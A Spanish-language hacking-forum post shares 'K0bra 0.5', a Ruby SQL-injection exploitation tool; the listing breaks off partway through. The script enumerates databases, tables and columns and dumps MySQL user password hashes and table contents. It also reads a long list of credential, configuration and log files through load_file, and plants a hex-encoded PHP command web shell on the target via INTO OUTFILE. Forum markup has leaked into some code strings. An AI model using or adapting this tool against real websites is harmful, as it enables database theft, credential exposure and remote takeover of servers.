[Ruby] K0bra 0.5

  • 1 Respuestas
  • 3975 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil

[Ruby] K0bra 0.5

  • en: Julio 24, 2015, 01:12:31 pm
Version mejorada de este script en Ruby para scannear la vulnerablidad SQLI en una pagina.

El script tiene las siguientes opciones :

  • Comprobar vulnerabilidad[/li]
  • Buscar numero de columnas[/li]
  • Buscar automaticamente el numero para mostrar datos[/li]
  • Mostras tablas[/li]
  • Mostrar columnas[/li]
  • Mostrar bases de datos[/li]
  • Mostrar tablas de otra DB[/li]
  • Mostrar columnas de una tabla de otra DB[/li]
  • Mostrar usuarios de mysql.user[/li]
  • Buscar archivos usando load_file[/li]
  • Mostrar un archivo usando load_file[/li]
  • Mostrar valores[/li]
  • Mostrar informacion sobre la DB[/li]
  • Crear una shell usando outfile[/li]
  • Todo se guarda en logs ordenados[/li][/list]

    El codigo :

    Código: Ruby
    1. #!usr/bin/ruby
    2. #K0bra 0.5
    3. #(C) Doddy Hackman 2015
    4.  
    5. require "net/http"
    6. require "open-uri"
    7.  
    8. $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
    9.  
    10. def toma(web)
    11.   begin
    12.     return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
    13.   rescue
    14.     return "Error"
    15.   end
    16. end
    17.  
    18. def decode_hex(text)
    19.   text = text.sub("0x","")
    20.   return [text].pack('H*')[0]
    21. end
    22.  
    23. def encode_hex(text)
    24.   return "0x"+text.unpack('H*')[0]
    25. end
    26.  
    27. def copyright()
    28.   print "\n-- == (C) Doddy Hackman 2015 == --\n"
    29.   gets.chomp
    30.   exit(1)
    31. end
    32.  
    33. def installer()
    34.   dir = Dir::pwd+"/"+"logs_webs"
    35.   if not FileTest::directory?(dir)
    36.     Dir::mkdir(dir)
    37.   end
    38. end
    39.  
    40. def savefile(file,text)
    41.   url = URI.parse(file)
    42.   save = File.open("logs_webs/"+url.host+".txt","a")
    43.   save.puts text+"\n"
    44.   save.close
    45. end
    46.  
    47. def bypass(op)
    48.   if op=="--"
    49.     return "+","--"
    50.   elsif op=="/*"
    51.    return "/**/","/**/"
    52.   elsif op=="%20"
    53.    return "%20","%00"
    54.   else
    55.    return "+","--"    
    56.   end
    57. end
    58.  
    59. def head()
    60.   clean()
    61.   print "
    62.  
    63. @      @@   @            
    64. @@     @  @ @@            
    65. @ @@  @  @  @ @   @ @ @@@
    66. @ @   @  @  @@ @ @@@ @  @
    67. @@    @  @  @  @  @   @@@
    68. @ @   @  @  @  @  @  @  @
    69. @@@ @   @@   @@@  @@@ @@@@@
    70.  
    71. "
    72. end
    73.  
    74. def volverinicio()
    75.   print "\n\n</li><li type="square"> Press any key to continue\n\n"[/li][/list]
    76.   gets.chomp
    77.   inicio()
    78. end
    79.  
    80. def clean()
    81.   if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
    82.     system("cls")
    83.   else
    84.     system("clear")
    85.   end
    86. end
    87.  
    88. def retorno(url,by)
    89.   print "\n</li><li type="square"> Finished"[/li][/list]
    90.   print "\n\n</li><li type="square"> Press any key to continue\n\n"[/li][/list]
    91.   gets.chomp
    92.   central(url,by)
    93. end
    94.  
    95. def gettables(url,by)
    96.   pass1,pass2 = bypass(by)
    97.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
    98.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
    99.   print "\n</li><li type="square"> Getting tables ...\n\n"[/li][/list]
    100.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    101.   if code1=~/K0BRA(.*?)K0BRA/
    102.     total = $1
    103.     print "</li><li type="square"> Tables Found : ",total,"\n\n"[/li][/list]
    104.     savefile(url,"\n</li><li type="square"> Tables Found : #{total}\n")[/li][/list]
    105.     for num in ("17"..total)
    106.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
    107.       if code2=~/K0BRA(.*?)K0BRA/
    108.         table = $1
    109.         print "</li><li type="square"> Table Found : "+table+"\n"[/li][/list]
    110.         savefile(url,"</li><li type="square"> Table Found : #{table}")[/li][/list]
    111.       end
    112.     end
    113.   else
    114.     print "[-] Not Found\n"
    115.   end
    116. end
    117.  
    118. def getcolumns(url,by,tablex)
    119.   tablexa = encode_hex(tablex)
    120.   pass1,pass2 = bypass(by)
    121.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
    122.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
    123.   print "\n</li><li type="square"> Getting columns ...\n\n"[/li][/list]
    124.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
    125.   if code1=~/K0BRA(.*?)K0BRA/
    126.     total = $1
    127.     print "</li><li type="square"> Columns Found : ",total,"\n\n"[/li][/list]
    128.     savefile(url,"\n</li><li type="square"> Table : #{tablex}")[/li][/list]
    129.     savefile(url,"</li><li type="square"> Columns Found : #{total}\n")[/li][/list]
    130.     for num in ("0"..total)
    131.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
    132.       if code2=~/K0BRA(.*?)K0BRA/
    133.         table = $1
    134.         print "</li><li type="square"> Column Found : "+table+"\n"[/li][/list]
    135.         savefile(url,"</li><li type="square"> Column Found : #{table}")[/li][/list]
    136.       end
    137.     end
    138.   else
    139.     print "[-] Not Found\n"
    140.   end
    141. end
    142.  
    143. def getdbs(url,by)
    144.   pass1,pass2 = bypass(by)
    145.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
    146.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
    147.   print "\n</li><li type="square"> Getting DBS ...\n\n"[/li][/list]
    148.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
    149.   if code1=~/K0BRA(.*?)K0BRA/
    150.     total = $1
    151.     print "</li><li type="square"> DBS Found : ",total,"\n\n"[/li][/list]
    152.     savefile(url,"\n</li><li type="square"> DBS Found : #{total}\n")[/li][/list]
    153.     for num in ("0"..total)
    154.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
    155.       if code2=~/K0BRA(.*?)K0BRA/
    156.         table = $1
    157.         print "</li><li type="square"> DB Found : "+table+"\n"[/li][/list]
    158.         savefile(url,"</li><li type="square"> DB Found : #{table}")[/li][/list]
    159.       end
    160.     end
    161.   else
    162.     print "[-] Not Found\n"
    163.   end
    164. end
    165.  
    166. def gettablesbydb(url,by,dbx)
    167.   data  = encode_hex(dbx)
    168.   pass1,pass2 = bypass(by)
    169.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
    170.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
    171.   print "\n</li><li type="square"> Getting tables ...\n\n"[/li][/list]
    172.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
    173.   if code1=~/K0BRA(.*?)K0BRA/
    174.     total = $1
    175.     print "</li><li type="square"> Tables Found : ",total,"\n\n"[/li][/list]
    176.     savefile(url,"\n</li><li type="square"> DBS : #{dbx}")[/li][/list]
    177.     savefile(url,"</li><li type="square"> Tables Found : #{total}\n")[/li][/list]
    178.     for num in ("0"..total)
    179.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
    180.       if code2=~/K0BRA(.*?)K0BRA/
    181.         table = $1
    182.         print "</li><li type="square"> Table Found : "+table+"\n"[/li][/list]
    183.         savefile(url,"</li><li type="square"> Table Found : #{table}")[/li][/list]
    184.       end
    185.     end
    186.   else
    187.     print "[-] Not Found\n"
    188.   end
    189. end
    190.  
    191. def getcolumnsbydb(url,by,db,tab)
    192.   data = encode_hex(db)
    193.   tabx = encode_hex(tab)
    194.  
    195.   pass1,pass2 = bypass(by)
    196.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
    197.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
    198.   print "\n</li><li type="square"> Getting columns ...\n\n"[/li][/list]
    199.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
    200.   if code1=~/K0BRA(.*?)K0BRA/
    201.     total = $1
    202.     print "</li><li type="square"> Columns Found : ",total,"\n\n"[/li][/list]
    203.     savefile(url,"\n</li><li type="square"> DB : #{db}")[/li][/list]
    204.     savefile(url,"</li><li type="square"> Table : #{tab}")[/li][/list]
    205.     savefile(url,"</li><li type="square"> Columns Found : #{total}\n")[/li][/list]
    206.     for num in ("0"..total)
    207.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
    208.       if code2=~/K0BRA(.*?)K0BRA/
    209.         table = $1
    210.         print "</li><li type="square"> Column Found : "+table+"\n"[/li][/list]
    211.         savefile(url,"</li><li type="square"> Column Found : #{table}")[/li][/list]
    212.       end
    213.     end
    214.   else
    215.     print "[-] Not Found\n"
    216.   end
    217. end
    218.  
    219. def mysqluser(url,by)
    220.   pass1,pass2 = bypass(by)
    221.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
    222.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
    223.    print "\n</li><li type="square"> Searching mysql.user\n\n"[/li][/list]
    224.   code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    225.   if code1=~/K0BRA(.*?)K0BRA/
    226.     total = $1
    227.     print "</li><li type="square"> Users Mysql Found : ",total,"\n\n"[/li][/list]
    228.     savefile(url,"</li><li type="square"> Users Mysql Found : "+total+"\n")[/li][/list]
    229.     for num in ("0"..total)
    230.       code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
    231.       if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
    232.         host,user,passw = $1,$2,$3
    233.         print "[Host] : "+host
    234.         print " [User] : "+user
    235.         print " [Pass] : "+passw+"\n"  
    236.         savefile(url,"[Host] : "+host)
    237.         savefile(url,"[User] : "+user)
    238.         savefile(url,"[Pass] : "+passw+"\n")
    239.       end
    240.     end
    241.   else
    242.     print "[-] Not Found\n"
    243.   end
    244. end
    245.  
    246. def details(url,by)
    247.   pass1,pass2 = bypass(by)
    248.   hextest = "0x2f6574632f706173737764" #/etc/passwd
    249.   hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
    250.   web1 = url.sub(/hackman/,"0x4b30425241")
    251.   web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
    252.   web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
    253.    print "\n</li><li type="square"> Extrating information of the DB\n"[/li][/list]
    254.   code1 = toma(web2)
    255.   if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
    256.     user,data,ver = $1,$2,$3
    257.     print "\n</li><li type="square"> Username : "+user[/li][/list]
    258.     print "\n</li><li type="square"> Database : "+data[/li][/list]
    259.     print "\n</li><li type="square"> Version : "+ver+"\n\n"[/li][/list]
    260.     savefile(url,"\n</li><li type="square"> Username : "+user)[/li][/list]
    261.     savefile(url,"</li><li type="square"> Database : "+data)[/li][/list]
    262.     savefile(url,"</li><li type="square"> Version : "+ver+"\n")[/li][/list]
    263.   else
    264.     print "[-] Not Found\n"
    265.   end
    266.    code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    267.    code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    268.    code4 = toma(web3)
    269.    if code2=~/K0BRA/
    270.      print "</li><li type="square"> Mysql User : ON\n"[/li][/list]
    271.      savefile(url,"</li><li type="square"> Mysqluser : ON")[/li][/list]
    272.    end
    273.    if code3=~/K0BRA/
    274.      print "</li><li type="square"> information_schema : ON\n"[/li][/list]
    275.      savefile(url,"</li><li type="square"> information_schema : ON")[/li][/list]
    276.    end
    277.    if code4=~/ERTOR854/
    278.      print "</li><li type="square"> load_file : ON\n"[/li][/list]
    279.      savefile(url,"</li><li type="square"> load_file : ON")[/li][/list]
    280.    end  
    281.    savefile(url,"") #espacio en blanco
    282.  end
    283.  
    284.  def dumper(url,by,table,col1,col2)
    285.   pass1,pass2 = bypass(by)
    286.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
    287.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
    288.   print "\n</li><li type="square"> Getting Values ...\n\n"[/li][/list]
    289.   code1 = toma(web1+pass1+"from"+pass1+table+pass2)
    290.   if code1=~/K0BRA(.*?)K0BRA/
    291.     total = $1
    292.     savefile(url,"\n</li><li type="square"> Table : "+table)[/li][/list]
    293.     savefile(url,"</li><li type="square"> Column 1 : "+col1)[/li][/list]
    294.     savefile(url,"</li><li type="square"> Column 2 : "+col2)[/li][/list]
    295.     print "</li><li type="square"> Values Found : ",total,"\n"[/li][/list]
    296.     savefile(url,"\n</li><li type="square"> Values Found : #{total}\n")[/li][/list]
    297.     for num in ("0"..total)
    298.       code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
    299.       if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
    300.         uno,dos = $1,$2
    301.         print "\n</li><li type="square"> "+col1+" : "+uno+"\n"[/li][/list]
    302.         print "</li><li type="square"> "+col2+" : "+dos+"\n"[/li][/list]
    303.         savefile(url,"\n</li><li type="square"> "+col1+" : "+uno)[/li][/list]
    304.         savefile(url,"</li><li type="square"> "+col2+" : "+dos)[/li][/list]
    305.       end
    306.     end
    307.   else
    308.     print "[-] Not Found\n"
    309.   end
    310. end
    311.  
    312. def fuzzfile(url,by)
    313.   pass1,pass2 = bypass(by)
    314.   print "\n</li><li type="square"> Fuzzing Files with load_file ....\n"[/li][/list]
    315.   $files.each do |file|
    316.     res = file
    317.     file = file.chomp
    318.     file = encode_hex(file)
    319.     web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
    320.     code = toma(web1)
    321.     if code=~/ERTOR854(.*?)ERTOR854/m
    322.       print "\n\n[File Found] : ",res
    323.       print "\n\n[Source Start]\n"
    324.       print $1
    325.       print "\n[Source End]"
    326.       savefile(url,"\n[File Found] : "+res)
    327.       savefile(url,"\n[Source Start]\n")
    328.       savefile(url,$1)
    329.       savefile(url,"\n[Source End]")
    330.     end    
    331.   end
    332.   print "\n"
    333. end
    334.  
    335. def abrirfile(url,by,file)
    336.   pass1,pass2 = bypass(by)
    337.   print "\n</li><li type="square"> Opening file ....\n"[/li][/list]
    338.   res = file
    339.   file = encode_hex(file)
    340.     web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
    341.     code = toma(web1)
    342.     if code=~/ERTOR854(.*?)ERTOR854/m
    343.       print "\n\n[File Found] : ",res
    344.       print "\n\n[Source Start]\n"
    345.       print $1
    346.       print "\n[Source End]\n"
    347.       savefile(url,"\n[File Found] : "+res)
    348.       savefile(url,"\n[Source Start]\n")
    349.       savefile(url,$1)
    350.       savefile(url,"\n[Source End]\n")
    351.     else
    352.       print "\n\n[-] Error\n\n"
    353.     end
    354.        
    355. end
    356.  
    357. def into(url,by,full,dir)
    358.   pass1,pass2 = bypass(by)
    359.   linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
    360.   lugar = full+"/cmd.php"
    361.   lugardos = dir+"/cmd.php"
    362.   h = URI.parse(url)
    363.   webtest = "http://"+h.host+lugardos
    364.   web1 = url.sub(/hackman/,linea)
    365.   formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
    366.   toma(formandoweb)
    367.   code = toma(webtest)
    368.   if code=~/Mini Shell By Doddy/
    369.     print "\n[Shell Up] : "+webtest+"\n"
    370.     savefile(url,"\n[Shell Up] : "+webtest+"\n")
    371.   else
    372.     print "\n\n[-] Error\n"
    373.   end
    374. end
    375.  
    376. def central(url,by)
    377.   clean()
    378.   head()
    379.   print "\n\n</li><li type="square"> Page : #{url}\n"[/li][/list]
    380.   print "</li><li type="square"> ByPass : #{by}\n\n"[/li][/list]
    381.  
    382.   print "\n[information_schema]\n\n"
    383.   print "1 - Show tables\n"
    384.   print "2 - Show columns of the a table\n"
    385.   print "3 - Show databases\n"
    386.   print "4 - Show tables from the a DB\n"
    387.   print "5 - Show columns from the a table of the DB\n"
    388.   print "\n[mysql.user]\n\n"
    389.   print "6 - Show users\n"
    390.   print "\n[Others]\n\n"
    391.   print "7 - Show details\n"
    392.   print "8 - Dump data\n"
    393.   print "9 - Fuzz Files with load_file\n"
    394.   print "10 - Load files with load_file\n"
    395.   print "11 - Create Shell\n"
    396.   print "12 - Show log\n"
    397.   print "13 - Change target\n"
    398.   print "14 - Exit\n\n\n"
    399.  
    400.   print "</li><li type="square"> Option : "[/li][/list]
    401.   op = gets.chomp
    402.   print "\n"
    403.    
    404.   if op == "1"
    405.     gettables(url,by)
    406.     retorno(url,by)
    407.   elsif op == "2"
    408.     print "\n</li><li type="square"> Table : "[/li][/list]
    409.     table = gets.chomp
    410.     getcolumns(url,by,table)
    411.     retorno(url,by)
    412.   elsif op == "3"
    413.     getdbs(url,by)
    414.     retorno(url,by)
    415.   elsif op == "4"
    416.     print "\n</li><li type="square"> DB : "[/li][/list]
    417.     db = gets.chomp
    418.     gettablesbydb(url,by,db)
    419.     retorno(url,by)
    420.   elsif op == "5"
    421.     print "\n</li><li type="square"> DB : "[/li][/list]
    422.     db = gets.chomp
    423.     print "\n</li><li type="square"> Table : "[/li][/list]
    424.     tab = gets.chomp
    425.     getcolumnsbydb(url,by,db,tab)
    426.     retorno(url,by)
    427.   elsif op == "6"
    428.     mysqluser(url,by)
    429.     retorno(url,by)
    430.   elsif op == "7"
    431.     details(url,by)
    432.     retorno(url,by)
    433.   elsif op == "8"
    434.     print "\n</li><li type="square"> Table : "[/li][/list]
    435.     table = gets.chomp
    436.     print "\n</li><li type="square"> Column 1 : "[/li][/list]
    437.     col1 = gets.chomp
    438.     print "\n</li><li type="square"> Column 2 : "[/li][/list]
    439.     col2 = gets.chomp
    440.     dumper(url,by,table,col1,col2)
    441.     retorno(url,by)
    442.   elsif op == "9"
    443.     fuzzfile(url,by)
    444.     retorno(url,by)
    445.   elsif op == "10"
    446.     print "\n</li><li type="square"> File : "[/li][/list]
    447.     file = gets.chomp
    448.     abrirfile(url,by,file)
    449.     retorno(url,by)
    450.   elsif op == "11"
    451.     print "\n[Full Source Discloure] : "
    452.     full = gets.chomp
    453.     print "\n[Directory to test] : "
    454.     dir = gets.chomp
    455.     into(url,by,full,dir)
    456.     retorno(url,by)
    457.   elsif op == "12"
    458.     urla = URI.parse(url)
    459.     ar = "logs_webs/"+urla.host+".txt"
    460.     system("start #{ar}")
    461.     retorno(url,by)
    462.   elsif op == "13"
    463.     inicio()
    464.   elsif op == "14"
    465.     copyright()
    466.   else
    467.     retorno(url,by)
    468.   end
    469. end
    470.  
    471. def findlength(url,by)
    472.   pass1,pass2 = bypass(by)
    473.   z = "1"
    474.   print "\n</li><li type="square"> Finding columns lenght ...\n\n"[/li][/list]
    475.   x = "concat(0x4b30425241,1,0x4b30425241)"
    476.   for num in ('2'..'25')
    477.     z = z+","+num
    478.     x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
    479.     code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
    480.     if code=~/K0BRA(.*?)K0BRA/
    481.       print "</li><li type="square"> The Page has "+num+" columns\n"[/li][/list]
    482.       print "</li><li type="square"> The number "+$1+" print data"[/li][/list]
    483.       z = z.sub($1,"hackman")
    484.       sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
    485.       savefile(url,"</li><li type="square"> SQLI : "+sqli)[/li][/list]
    486.       savefile(url,"</li><li type="square"> Bypass : "+by+"\n")[/li][/list]
    487.       central(sqli,by)
    488.     end
    489.   end
    490.   print "[-] Columns lenght not found\n"
    491.   volverinicio()
    492. end
    493.  
    494. def testvul(page,by)
    495.   pass1,pass2 = bypass(by)
    496.   print "\n\n</li><li type="square"> Testing vulnerability ...\n\n"[/li][/list]
